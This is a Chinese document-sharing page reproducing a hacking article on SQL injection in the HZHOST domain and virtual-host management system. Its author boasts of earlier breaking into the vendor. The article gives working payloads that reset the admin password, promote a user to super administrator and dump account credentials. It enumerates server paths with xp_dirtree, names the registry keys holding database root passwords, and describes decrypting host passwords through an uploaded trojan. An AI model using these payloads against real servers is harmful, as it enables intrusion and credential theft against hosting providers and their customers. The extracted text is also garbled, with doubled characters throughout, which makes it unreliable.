HZHOST域名虚拟主机管理系统sql注射漏洞+进一步利用_第1页
HZHOST域名虚拟主机管理系统sql注射漏洞+进一步利用_第2页
HZHOST域名虚拟主机管理系统sql注射漏洞+进一步利用_第3页
HZHOST域名虚拟主机管理系统sql注射漏洞+进一步利用_第4页
HZHOST域名虚拟主机管理系统sql注射漏洞+进一步利用_第5页
已阅读5页,还剩2页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、这是一个域域名主机实实时管理系系统。在百百度搜索: tittle: (域名主主机实时管管理系统) ,会找找到大量采采用这种系系统的网站站!太术语语了。就是是在线开通通ftp.sql.web的的一个管理理系统。一一套webb程序。和和IIS管管理程序。实现在线线开通的玩玩 意。所所以:我们们可以免费费申请域名名和空间!哈哈!web程序序方面写的的非常严谨谨。大量的的过滤。由由于是商业业版的程序序,所以我我没有源码码。本来是是有的,但但是放在家家里的电脑脑上。放暑暑假时搞的的shelll现在都都被删了。我现现在又比较较懒,就没没去弄源代代码。反正正大家知道道怎么弄的的就行了。这又是一个个文本框的的

2、注射。我我真不知道道作者是怎怎么想的。其他地方方都被过滤滤了。就留留下域名管管理这里没没过滤。官方放暑假假的时候就就被我搞了了一遍,过过了一个月月他发现了了。删了我我的sheell。不不知道他怎怎么知道我我从那里下下的手搞的的他。他居居然补了漏漏洞。先上上图,再说说下利用方方法。123 UPDAATE memllst SET u_psss=ee10addc39449ba559abbbe56ee057ff20f8883e WHERRE u_nme=admmin-这一句是把把用户addmin的的密码修改改为1233456。管理员的的后台地址址一般是hhttp:/m/masster或或者直接在在首页

3、登陆陆了按切换换到管理员员后台。如如果admmin不是是超级管理理员,那就就有三个办办法。一是自己构构造语句爆爆出来。二二是提升自自己注册的的用户的权权限。三是是直接爆网网站路径,再再来个差异异备份。第一个方法法我给出一一条示范语语句:123 and (sellect top 1 issnulll(casst(uu_nmee ass nvaarchaar(40000),chaar(322)+cchar(94)+isnuull(ccast(U_ppss as nnvarcchar(40000),cchar(32) froom (sselecct toop 2uu_nmee,U_ppss ffro

4、m hzhhost.mmemlsst wwheree 1=11 ordder bby uu_nmee) tt ordder bby uu_nmee deesc )0- andd 1=1可以同时爆爆出一个用用户的帐号号和密码。想爆出其其他用户的的语句自己己构造吧。第二个方法法是:123 UPDAATE memllst SET u_syys=6 WHERRE u_nme=你注册册的用户名名-123 UPDAATE memllst SET u_pwwr=2 WHERRE u_nme=你注册册的用户名名-这2句话就就能够提升升自己为超超级管理员员第三个方法法很麻烦。但是很有有效果。直直捣黄龙。很强大大

5、。我给出出如下语句句,大家自自己研究去去吧!爆路径语句句第一步:建建立表1223 ;dropp tabble ffoofooofooo;creeate tablle fooofooofoo(id innt iidenttity (1,11) noot nuull,namee nnvarcchar (3000) nnot nnull,deppth intt noot nuull,isfiile nvaarchaar (50) nulll);- andd 1=1第二步:1123 ;decclaree z nvarrcharr(40000) sset z=0 xx630003a0005c000 in

6、ssert fooffoofooo exxecutte maasterr.xpp_dirrtreee z,1,1- annd 11=11注意:0 xx630003a0005c000 = CC: 为sqll ENCCODE其他的自己己找工具去去转吧!第三步:暴暴出总数 123 andd (seelectt casst(coount(*) aas vaarchaar(80000)+chaar(944) frrom ffoofooofooo)0- annd 11=11第四步:暴暴出你想要要的文件夹夹名字和文文件名字 123 andd 0(seleect ttop 11 casst(iisfille

7、aas nvvarchhar(44000)+chhar(994)+ccast(namme aas nvvarchhar(44000) frrom (seleect ddistiinct top 1 * ffrom fooffoofooo orrder by iisfille,naame) t orrder by iisfille deesc,nname descc)- and 1=1修改中间红红色的1,依依次爆出。至于差异备备份语句。让nbssi3告诉诉你吧。对HZHOOST域名名虚拟主机机管理系统统sql注注射漏洞进进一步利用用!我记得还有有2篇关于于hzhoost的漏漏洞利用文文章。名字字

8、不记得了了。大家去去搜索“hhzhosst漏洞”找找吧!里面提到到下面两点点内容!1。是提到到c:wwindoowsttemp下下有hzhhost主主机留下的的ftp登登陆记录。有用户名名和密码22。是利用用hzhoost拿系系统主机最最高权限的的。安装了hzzhostt的主机,其msssql ssa密码,mysqql rooot密码码还有seerv-uu的admminisstrattor密码码全部保存存在注册表表中。位置置在HKEY_LOCAAL_MAACHINNEsooftwaarehhzhosstcoonfiggsetttinggsmyysqlppassHHKEY_LOCAAL_MAAC

9、HINNEsooftwaarehhzhosstcoonfiggsetttinggsmaasterrsvrppass经过了hzzhostt自己的加加密方式,象象eLVCllO4tzzsKBff#deee524443a38872ccc159这样的字符符串。不过过在hzhhost后后台可以还还原!拿到到了sa密密码,或者者roott密码,最最高权限就就在眼前!禁止了ww.s的话话。大家就就传asppx木马导导撒!我们传了一一个aspp木马上去去后。在iincsconsstr.aasp下面面可以看到到数据库连连接串。然然后连接到到数据库。通过执行行SELECCT * FROMM hsstlstt语句。

10、可以以看到很多多主机记录录。如图发发现什么没没有?h_ftpppass的的密码和hhzhosst主机自自己的加密密串很相似似。没错,主主机管理的的密码也是是经过他自自己的加密密方式加了了密!而我我们在主机机管理的地地方!看到到明文密码码。说明他他又给还原原回来了。明白了么么?我们先先通过asspx木马马导出myysql,mmssqll的rooot,saa密码加密密串后。我我们通过这这条语句,修修改别人的的主机密码码。UPDATTE hhstlsst SSET hh_ftpppss=aPWWw3j44zMaKK83lHHMBoff9fc2298b11d3d00a WWHEREE h_IID=1000004471然后回过头头去看主机机密码。(这这时候被转转成了明文文)就拿到到了rooot密码为为:sphhil_00709221注意:由于有多多种限制。我截的图图

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论